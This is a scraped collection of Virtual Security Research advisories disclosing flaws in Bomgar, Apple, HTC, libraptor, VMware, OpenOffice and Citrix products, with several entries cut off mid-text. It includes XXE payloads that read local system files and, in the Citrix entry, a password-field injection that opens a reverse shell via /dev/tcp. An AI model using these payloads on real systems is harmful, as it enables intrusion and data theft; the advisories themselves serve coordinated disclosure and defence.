Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)
Virtual Security Research, LLC. https://www.vsecurity.com/ Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Bomgar Remote Support - Local Privilege Escalation Release Date: 2017-10-26 Application: Bomgar Remote Support Versions: 15.2.x before 15.2.3 16.1.x before 16.1.5 16.2.x before 16.2.4 Severity: High/Medium Author: Robert Wessen Author: Mitch Kucia Vendor Status: Update Released [2] CVE Candidate: CVE-2017-5996 Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-~ From Bomgar's website [1]: "The fastest, most secure way for experts to access and support the systems that need them." Vulnerability Overview ~~ In mid-January, VSR identified a privilege escalation vulnerability in Bomgar Remote Support application which can be used to escalate from any unprivileged user to nt authority/system on Microsoft Windows 7 systems. The vulnerability originates from an nt authority/system service being executed from a folder with excessive permissions. The exploit requires a remote support agent to log into the affected system. Vulnerability Details ~---~ The Bomgar Remote Support agent enables remote support personnel to establish screen sharing, access command shell, and perform system administration tasks on machines with the agent installed. The agent, by default, creates a service as the Windows LocalSystem account and creates a folder at C:\ProgramData\bomgar-ssc-0x (where each h is a hex character). The agent is also executed from this folder, so the folder is included in the Windows dynamic library loader search path. The default permissions on the C:\ProgramData folder allow all users, even unprivileged ones, to append and write files. These permissions are inherited by sub-directories unless explicitly overridden. These permissions are not changed during the installation of the agent, so a DLL planting/hijack is possible. A Trojan horse with the same name as one of the requested, but not present libraries can be placed inside the C:\ProgramData\bomgar-ssc-0x folder since this folder is writeable by all users. When a remote support person attempts to connect to the host, the malicious library will be loaded and code can executed as nt authority/system. Versions Affected ~---~ The issue was originally discovered in version 16.1.1, although it likely exists since at least version 14. All testing was performed exclusively on Windows 7, however the vulnerability is suspected to be present on all supported Windows platforms. Vendor Response ~-~ The following timeline details Bomgar's response to the reported issue: 2017-02-05 VSR contacted Bomgar via several public email addresses to file a security report. 2017-02-06 Bomgar replied, VSR provided additional details on the vulnerability and Bomgar began internal triage. 2017-02-13 Bomgar confirmed reproduction and indicated a hotfix will be available to select customers on 2017-02-17. Patch for all customers will be available at a later date. 2017-03-28 Bomgar releases patch in Remote Support versions 15.2.3 [2], 16.1.5 [3], and 16.2.4 [4]. 2017-10-26 VSR advisory released. Recommendation ~~ Upgrade all client installs to the latest version of Bomgar Remote Support software as soon as possible. Common Vulnerabilities and Exposures (CVE) Information ~~ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2017-5996 to this issue. This is a candidate for inclusion in the CVE list (https://cve.mitre.org), which standardizes names for security problems. Acknowledgments ~--~ Thanks to the Bomgar development team for a prompt response, confirmation, and patch. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= References: 1. https://www.bomgar.com/ 2. https://www.bomgar.com/support/changelog/remote-support-15-2-3 3. https://www.bomgar.com/support/changelog/remote-support-16-1-5 4. https://www.bomgar.com/support/changelog/remote-support-1624 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising
Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. See the VSR disclosure policy for more information on our responsible disclosure practices: http://www.vsecurity.com/company/disclosure =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright 2014 Virtual Security Research, LLC. All rights reserved. signature.asc Description: Message signed with OpenPGP using GPGMail
Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw Release Date: 2014-09-17 Application: Apple iOS Foundation Framework Apple OS X Foundation Framework Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4 Severity: High Author: George D. Gal ggal (at) vsecurity.com Vendor Status: Fix Available CVE Candidate: CVE-2014-4374 Reference: http://www.vsecurity.com/resources/advisory/20140917-1/ http://support.apple.com/kb/HT1222 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-~ - From [1]: Xcode includes software development kits (SDKs) that enable you to create applications that run on specific versions of iOS or OS X?including versions different from the one you are developing on. This technology lets you build a single binary that takes advantage of new features when running on a system that supports them, and gracefully degrades when running on an older system. Some Apple frameworks automatically modify their behavior based on the SDK an application is built against for improved compatibility. Vulnerability Overview ~~ In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of the iOS SDK whereby the NSXMLParser class, resolves XML External Entities by default despite documentation which indicates otherwise. In addition, settings to change the behavior of XML External Entity resolution appears to be non-functional. This vulnerability, commonly known as XXE (XML eXternal Entities) attacks could allow for an attacker's ability to use the XML parser to carry out attacks ranging from network port scanning, information disclosure, denial of service, and potentially to carry out remote file retrieval. Further review also revealed that the Foundation Framework used in OS X 10.9.x is also vulnerable. The severity of this vulnerability varies. For example, in situations where the application does not reflect user influenced XML, retrieval of files may be limited, however using external HTTP entities could be used to conduct port scans. In other scenarios if core iOS applications transmit XML over plaintext protocols, these protocols could potentially be intercepted to leak contents of any file on the mobile device. For App Store applications files which could be accessed may be limited to those under the individual chrooted application directories, or in the case of jailbroken devices, any file on the filesystem. Vulnerability Details ~---~ Apple's NSXMLParser documentation [2] indicates that external entity resolution is disabled in the parser by default. However, inspection of multiple applications running on iOS 7.0 and 7.1 now appear to resolve external entities by default, and even when attempting to disable entity resolution explicitly as shown below: [nsXmlParser setShouldResolveExternalEntities:NO]; The following source code demonstrates the flaw: - - (void) doParse:(NSData *)data { // create and init NSXMLParser object NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data]; // Why does the following not even work!? [nsXmlParser setShouldResolveExternalEntities:NO]; // create and init our delegate VSRParser *parser = [[VSRParser alloc] initXMLParser]; // set delegate [nsXmlParser setDelegate:parser]; // parsing... BOOL success = [nsXmlParser parse]; // test the result if (success) { NSLog(@No errors); NSMutableArray *stuff = [parser tests]; } else { NSLog(@Error parsing document!); } [parser release]; [nsXmlParser release]; } When using a vulnerable input XML file as shown below, the XML parser attempts to perform network name resolution and access the resource defined by http; ?xml version=1.0 encoding=UTF-8? !DOCTYPE roottag [ !ENTITY http SYSTEM http://iossdk-xxe.apt.vsecurity.org/; !ENTITY file SYSTEM file:///etc/hosts ] test vsr tag1file;/tag1 tag2http;/tag2 /vsr /test The following DNS and web server log entries demonstrate attempts to resolve http; 2014-05-19_13:26:28.31088 ... iossdk-xxe.apt.vsecurity.org XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] GET /xxe HTTP/1.0 404 446 - - In more serious exploitation scenarios, plaintext XML communications between a server and iOS mobile application, or OS X client application could be intercepted and modified in transit to reference a file present on the client device. If the device reflects this value in subsequent communications or errors the contents of files stored on the device could be leaked to an attacker Versions Affected ~---~
HTC IQRD Android Permission Leakage (CVE-2012-2217)
VSR Security Advisory http://www.vsecurity.com/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: HTC IQRD Android Permission Leakage Release Date: 2012-04-20 Application: IQRD on HTC Android Phones Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released CVE Candidate: CVE-2012-2217 Reference: http://www.vsecurity.com/resources/advisory/20120420-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- The IQRD service is HTC's implementation of a Carrier IQ porting layer on several HTC Android phones. Carrier IQ is a data collection framework that may be deeply integrated into the Android application stack in order to provide cell carriers with detailed metrics data on device and network activity [1]. To complete the integration of Carrier IQ on a specific device, phone manufacturers provide a porting layer that allows the Carrier IQ service to perform specific actions that may vary by device. Vulnerability Details - On December 22th, VSR identified a vulnerability in IQRD. The IQRD service listens locally on a TCP socket bound to port 2479. This socket is intended to allow the Carrier IQ service to request device-specific functionality from IQRD. Unfortunately, there is no restriction or validation on which applications may request services using this socket. As a result, any application with the android.permission.INTERNET permission may connect to this socket and send specially crafted messages in order to perform potentially malicious actions. In particular, it is possible for malicious applications to: 1. Trigger UI popup messages 2. Generate tones 3. Send arbitrary outbound SMS messages that do not appear in a user's outbox, facilitating toll fraud 4. Retrieve a user's Network Access Identifier (NAI) and corresponding password, potentially allowing rogue devices to impersonate the user on a CDMA network Versions Affected - The issue is confirmed to affect the HTC EVO 4G, HTC EVO Design 4G, EVO Shift 4G, HTC EVO 3D, HTC EVO View 4G, and HTC Hero on Sprint; and the HTC Vivid on ATT. Vendor Response --- The following timeline details HTC's response to the reported issue: 2011-12-22Vulnerability reported to HTC 2011-12-28HTC confirms receipt, replies that fix is planned for early 2012 2012-03-10VSR requests status update 2012-03-16HTC confirms fix has been published 2012-03-26HTC requests clarification on finding 2012-03-26VSR provides clarification on finding, requests confirmation on status of fix 2012-04-02HTC provides confirmation of fix, requests further clarification 2012-04-02VSR provides clarification on finding 2012-04-12VSR provides draft advisory to HTC 2012-04-13HTC provides corrections to advisory, requests disclosure date 2012-04-20Coordinated disclosure Recommendation -- HTC has issued a fix that will typically be provided as an OTA update by affected cell carriers. If the update has not automatically been installed, it is possible to retrieve the update manually by navigating to Menu - Settings - System Updates - HTC Software Update - Check Now. The following software versions on Sprint are confirmed to resolve this issue: HTC EVO 4G: 4.67.651.3 HTC EVO Design 4G: 2.12.651.5 HTC EVO Shift 4G: 2.77.651.3 HTC EVO 3D: 2.17.651.5 HTC EVO View 4G:2.23.651.1 The following software versions on ATT are confirmed to resolve this issue: HTC Vivid: 3.26.502.56 All affected devices except the HTC Hero have received an over-the-air update. HTC and Sprint have declined to update the HTC Hero, citing its 2009 release, minimal current usage, and lack of malicious applications in the Android Marketplace exploiting this vulnerability. Users should be aware that devices that no longer receive updates due to switching carriers may remain vulnerable. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2012-2217 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements Thanks to HTC for their response and fix. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Carrier IQ http://www.carrieriq.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied
CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: libraptor - XXE in RDF/XML File Interpretation Release Date: 2012-03-24 Applications: libraptor / librdf (versions 1.x and 2.x) Also Affected: OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice Author: tmorgan {a} vsecurity * com Vendor Status: Patches available; major downstream vendors and operating system distributions notified CVE Candidate: CVE-2012-0037 Reference: http://www.vsecurity.com/resources/advisory/20120324-1/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-~ Raptor is a free software / Open Source C library that provides a set of parsers and serializers that generate Resource Description Framework (RDF) triples by parsing syntaxes or serialize the triples into a syntax. The supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads, N-Triples, RSS 1.0 and XMP. -- libraptor web site [1] libraptor is a component of librdf[2] which is used by a variety of open source software to interpret Resource Description Framework (RDF) [3] formats. Vulnerability Overview ~~ In December 2011, VSR identified a vulnerability in multiple open source office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe interpretation of XML files with custom entity declarations. Deeper analysis revealed that the vulnerability was caused by acceptance of external entities by the libraptor library, which is used by librdf and is in turn used by these office products. In the context of office applications, these vulnerabilities could allow for XML External Entity (XXE) attacks resulting in file theft and a loss of user privacy when opening potentially malicious ODF documents. For other applications which depend on librdf or libraptor, potentially serious consequences could result from accepting RDF/XML content from untrusted sources, though the impact may vary widely depending on the context. Vulnerability Details ~---~ Open Document Format (ODF) files consist of a collection of several different files stored in a ZIP archive. Included in this set is a manifest.rdf file which is formatted according to the RDF/XML representation. The RDF format is intended to be used for storing metadata associated with specific document elements. The manifest.rdf file can reference secondary RDF files within the ODF file as well as external document schemas. The RDF file parser (librdf) used by the affected office products allows DTD specifications within the RDF files themselves. In addition, the parser interprets external entities which may reference arbitrary external files, HTTP and FTP resources. For instance, the following evil.rdf file was created within a valid ODF text archive (.odt file) which was referenced by the internal manifest.rdf file: ?xml version=1.0 encoding=utf-8? !DOCTYPE rdf [ !ENTITY file SYSTEM file:///c:/windows/win.ini ] rdf:RDF xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#; rdf:Description rdf:about=content.xml#id1265690860 ns0:comment xmlns:ns0=http://www.w3.org/2000/01/rdf-schema#;file;/ns0:comment /rdf:Description /rdf:RDF Upon opening the malicious .odt file in OpenOffice for Windows, the c:\windows\win.ini file was read and included in the document metadata. Upon saving the document, this metadata was included literally in the resulting evil.rdf file (within the .odt): ?xml version=1.0 encoding=utf-8? rdf:RDF xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#; rdf:Description rdf:about=content.xml#id1265690860 ns1:comment xmlns:ns1=http://www.w3.org/2000/01/rdf-schema#;; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 /ns1:comment /rdf:Description /rdf:RDF The malicious XML entities could also include URLs to attacker-controlled HTTP or FTP resources. This would allow an attacker to determine when a document was opened, potentially resulting in reduced privacy. However, based on current analysis of the affected office applications, the most serious attack scenario is likely to be: 1. Attacker posts a malicious file on a web site or sends file to victim. The file contains a form for the victim to fill out and return to the attacker. 2. Victim fills out the form, saves it, sends it back to the attacker. 3. Attacker is able to read the contents of any stolen files as embedded metadata, simply by unzipping the
VMware Tools Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released [2] CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146 Reference: http://www.vsecurity.com/resources/advisory/20110603-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: VMware Tools is a suite of utilities that enhances the performance of the virtual machine's guest operating system and improves management of the virtual machine. Without VMware Tools installed in your guest operating system, guest performance lacks important functionality. Vulnerability Overview - -- On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a suite of utilities shipped by VMware with multiple product offerings, as well as by open-source distributions as the open-vm-tools package. The first of these issues results in a minor information disclosure vulnerability, while the second two issues may result in privilege escalation in a VMware guest with VMware Tools installed. Product Background - -- VMware Tools includes mount.vmhgfs, a setuid-root utility that allows unprivileged users in a guest VM to mount HGFS shared folders. Also shipped with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which handles initial setup to prepare for running vmware-user, which grants users access to other utilities included with VMware Tools. Vulnerability Details - - CVE-2011-2146: The mount.vmhgfs utility makes a call to stat() to check for the existence and type (file, directory, etc.) of the user-supplied mountpoint, and provides an error message if the provided argument does not exist or is not a directory. Because mount.vmhgfs is setuid-root, a local attacker can leverage this behavior to identify if a given path exists in the guest operating system and whether it is a file or directory, potentially violating directory permissions. CVE-2011-1787: The mount.vmhgfs utility checks that the user-provided mountpoint is owned by the user attempting to mount an HGFS share prior to performing the mount. However, a race condition exists between the time this checking is performed and when the mount is performed. Successful exploitation allows a local attacker to mount HGFS shares over arbitrary, potentially root-owned directories, subsequently allowing privilege escalation within the guest. CVE-2011-2145: The vmware-user-suid-wrapper utility attempts to create a directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to make this directory root-owned and world-writable. By placing a symbolic link at the location of this directory, vmware-user-suid-wrapper will cause the symbolic link target to become world-writable, allowing local attackers to escalate privileges within the guest. Only FreeBSD and Solaris versions of VMware Tools are affected. Versions Affected - - VMware's advisory [2] indicates the following product versions are affected: VMware Product Running Replace with/ Product Version on Apply Patch = === = vCenter any Windows not affected Workstation 7.1.x Linux 7.1.4 or later* Workstation 7.1.x Windows 7.1.4 or later* Player 3.1.x Linux 3.1.4 or later* Player 3.1.x Windows 3.1.4 or later* AMS any any not affected Fusion 3.1.x OSX Fusion 3.1.3 or later* ESXi4.1 ESXiESXi410-201104402-BG* ESXi4.0 ESXiESXi400-201104402-BG* ESXi3.5 ESXiESXe350-201105402-T-SG* ESX 4.1 ESX ESX410-201104401-SG* ESX 4.0 ESX ESX400-201104401-SG* ESX 3.5 ESX ESX350-201105406-SG* ESX 3.0.3 ESX not affected The open-vm-tools package prior to version 2011.02.23-368700 is also affected. Vendor Response - --- The following timeline details VMware's response to the reported issue: 2011-02-17VMware receives initial vulnerability report 2011-02-17VMware security team acknowledges receipt 2011-03-04VMware provides status update 2011-03-04VSR initiates discussion of disclosure date 2011-03-10VMware responds, indicates internal coordination underway 2011-03-11VSR
Apple HFS+ Information Disclosure Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Apple HFS+ Information Disclosure Vulnerability Release Date: 2011-03-22 Application: Apple OS X kernel (XNU) Versions: All versions = xnu-1504.7.4 Severity: Medium Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com Vendor Status: Patch Released [2] CVE Candidate: CVE-2011-0180 Reference: http://www.vsecurity.com/resources/advisory/20110322-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Beneath the appealing, easy-to-use interface of Mac OS X is a rock-solid, UNIX-based foundation that is engineered for stability, reliability, and performance. The kernel environment is built on top of Mach 3.0 and provides high-performance networking facilities and support for multiple, integrated file systems. Vulnerability Overview - -- On June 30th, VSR identified a vulnerability in HFS+, a filesystem implemented in the OS X XNU kernel. HFS+ is the default filesystem in use on many installations of the Mac OS X operating system. By exploiting this vulnerability, an unprivileged user with local access to a machine using HFS+ may be able to read raw filesystem data, bypassing file permissions and resulting in information disclosure. Vulnerability Details - - Users may interact with the filesystem using the standard ioctl interface. HFS+ features an ioctl called F_READBOOTSTRAP that allows unprivileged users to read raw data from an HFS+ filesystem. The ioctl intends to ensure that this data is restricted to the first 1024 bytes, where bootstrap information is stored. However, due to an integer overflow in the code that attempts to enforce this restriction, it is possible for an unprivileged user to use this ioctl to read large portions of filesystem data outside of this byte range, leading to an information disclosure vulnerability. The vulnerable check reads as follows, in bsd/hfs/hfs_readwrite.c: if (user_bootstrapp-fbt_offset + user_bootstrapp-fbt_length 1024) return EINVAL; If a user provides values for the fbt_offset and fbt_length members such that their sum overflows and wraps around to an integer less than 1024, portions of filesystem data outside the intended range will be read and returned to the user. Proof-of-Concept Exploit - VSR has developed a proof-of-concept exploit [3] to both demonstrate the severity of this issue as well as allow users and administrators to verify the existence of the vulnerability. The exploit leverages the integer overflow to read arbitrary amounts of filesystem data at a negative offset from the end of the filesystem. Versions Affected - - Testing was performed on Darwin Kernel Version 10.4.0, xnu-1504.7.4~1, but review of older source code suggests that all versions of OS X may be affected. Vendor Response - --- The following timeline details Apple's response to the reported issue: 2010-07-01Apple was provided a draft advisory 2010-07-02Apple acknowledges receipt of advisory 2010-07-22Request for confirmation of issue 2010-07-25Apple confirms issue under investigation 2010-09-02Request for status update 2010-09-02Apple confirms fix is being tested 2010-10-13Request for status update 2010-10-14Apple confirms fix is planned for undetermined date 2010-11-16Request for status update 2010-11-16Apple confirms ship date is set for early 2011 2011-01-18Request for status update 2011-01-18Apple confirms ship date for early April 2011-03-21Apple publishes fix Apple's advisory may be obtained at: http://support.apple.com/kb/HT4581 Recommendation - -- Apply the fix provided by Apple's OS X security update [2]. Common Vulnerabilities and Exposures (CVE) Information - -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2011-0180 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Darwin and Core Technologies http://developer.apple.com/mac/library/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html 2. Apple Security Update 2011-001 http://support.apple.com/kb/HT4581 3. HFS+ F_READBOOTSTRAP information disclosure exploit http://www.vsecurity.com/download/tools/hfs-dump.c - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is distributed for educational
OpenOffice.org Multiple Memory Corruption Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities Release Date: 2011-01-26 Application: Oracle OpenOffice.org Versions: 3.2 and earlier Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454 Reference: http://www.vsecurity.com/resources/advisory/20110126-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: OpenOffice.org 3 is the leading open-source office software suite for word processing, spreadsheets, presentations, graphics, databases and more. It is available in many languages and works on all common computers. It stores all your data in an international open standard format and can also read and write files from other common office software packages. It can be downloaded and used completely free of charge for any purpose. Vulnerability Overview - -- On August 20th, VSR identified multiple memory corruption vulnerabilities in OpenOffice.org. By convincing a victim to open a maliciously crafted RTF or Word document, arbitrary code may be executed on the victim's machine. Vulnerability Details - - CVE-2010-3451: OpenOffice.org uses its own internal memory management system for parsing tables in RTF documents. Information about each table row is inserted, element by element, into an SwTableBoxes object. These objects contain a fixed amount of data, and when they have reached capacity, a resize() method is called to double the space previously allocated for cell contents. When this method is called, the new space will be allocated on top of recently freed memory containing file data without clearing this memory. Because of a bug in the RTF parser, corrupt table data may cause the insertion of elements into an SwTableBoxes object to skip an index rather than remaining strictly sequential. When this occurs, the nA field, representing the number of data elements used in the object, will be out-of-sync with the index of the most recently inserted element, allowing exploitation of a use-after-free vulnerability. To exploit this issue, corrupt RTF table data first causes the nA field to become out-of-sync with the index of the most recently inserted element in an SwTableBoxes object. Next, the resize() method is called when the object reaches capacity, resulting in its data being reallocated on top of attacker-controlled memory. Finally, during the parsing of an RTF_ROW token, the nA field is used to index into the SwTableBoxes cell data in an attempt to retrieve the most recently added object. Because this index is out-of-sync and the data was recently moved on top of previously used memory, this will result in retrieving an attacker-controlled object from the heap. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code. CVE-2010-3452: Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for multi-level lists, it is possible to trigger a use-after-free vulnerability. When this tag is followed by an unexpected character, its token value may be negative. The parser attempts to restrict this value to less than the MAXLEVEL constant, but since a signed comparison is used, a negative value will pass this check. This value is then used as an index to retrieve an SwNumFmt object from an array on the heap. By manipulating the heap, it is possible to cause the retrieval of an attacker-controlled object. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code. CVE-2010-3453: When processing override level numbers in parsing list data for Word documents, a user-controlled value is used to index into a vector for an assignment without checking that this index is less than the size of the vector. As a result, an attacker-controlled object may be written to a location on the heap past the bounds of the vector, potentially allowing arbitrary code execution. CVE-2010-3454: When parsing Word documents, two signed short values are read directly from the document file to determine where to place NULL terminators after copying additional data in. Because these indexes are not checked in any way, an attacker may use this to write NULL bytes to two arbitrary locations in memory, potentially allowing arbitrary code execution. Versions Affected - - Versions prior to OpenOffice.org 3.3 are affected. Vendor Response - --- The following timeline details OpenOffice.org's response to the reported issues: 2010-08-20Initial
VSR Advisories: Citrix Access Gateway Command Injection Vulnerability
VSR Security Advisory http://www.vsecurity.com/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Citrix Access Gateway Command Injection Vulnerability Release Date: 2010-12-21 Application: Citrix Access Gateway Versions: Access Gateway Enterprise Edition (up to 9.2-49.8) Access Gateway Standard Advanced Edition (prior to 5.0) Severity: High Author: George D. Gal ggal (at) vsecurity (dot) com Vendor Status: Updated Software Released, NT4 Authentication Removed [2] CVE Candidate: CVE-2010-4566 Reference: http://www.vsecurity.com/resources/advisory/20101221-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- From [1]: Citrix(R) Access Gateway(TM) is a secure application access solution that provides administrators granular application-level control while empowering users with remote access from anywhere. It gives IT administrators a single point to manage access control and limit actions within sessions based on both user identity and the endpoint device, providing better application security, data protection, and compliance management. Vulnerability Overview -- On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within the way user authentication credentials are handled. Under certain configuration settings it appears that user credentials are passed as arguments to a command line program to authenticate the user. A lack of data validation and the mechanism in which the external program is spawned results in the potential for command injection and arbitrary command execution on the Access Gateway. Vulnerability Details - The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway. The following commands are executed by the ntlm_authenticator during this process: vpnadmin 10130 0.0 0.0 2104 976 ?S15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U username%password -p 139 -S xxx.xxx.xxx.xxx /tmp/samedit-samuser-stdout.50474096 2 /dev/null vpnadmin 10131 0.0 0.1 3852 1528 ?S15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U username% -p 139 -S xxx.xxx.xxx.xxx By submitting a password value as shown below, it is possible to establish a reverse shell to a netcat listener: | bash -i /dev/tcp/HOST/PORT 01 Using a simple ping command in the password field an attacker could use timing attacks to verify the presence of the vulnerability: | ping -c 10 HOST The ping command above will attempt to send 10 ICMP echo requests to the target host, resulting in a noticable delay easily detected by vulnerability scanners. Versions Affected - Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. According to the vendor this vulnerability affects all versions of Access Gateway Enterprise Edition up to version 9.2-49.8, and all versions of the Access Gateway Standard and Advanced Editions prior to Access Gateway 5.0. Vendor Response --- The following timeline details the vendor's response to the reported issue: 2010-08-06Citrix was provided a draft advisory. 2010-08-10Citrix acknowledged receipt of draft advisory. 2010-08-16VSR follow-up to determine confirmation of issue. 2010-08-16Citrix confirmed issue. 2010-09-14VSR follow-up to determine status of issue. 2010-09-29VSR follow-up to determine status of issue. 2010-09-30Citrix confirmed continued investigation of the issue. 2010-10-19VSR follow-up to determine status of issue. 2010-10-26Citrix verified issue only exists in NT4 authentication feature. 2010-12-01VSR follow-up to determine status of issue. 2010-12-02Citrix confirmed December 14th release of security bulletin. 2010-12-14Citrix releases security bulletin. 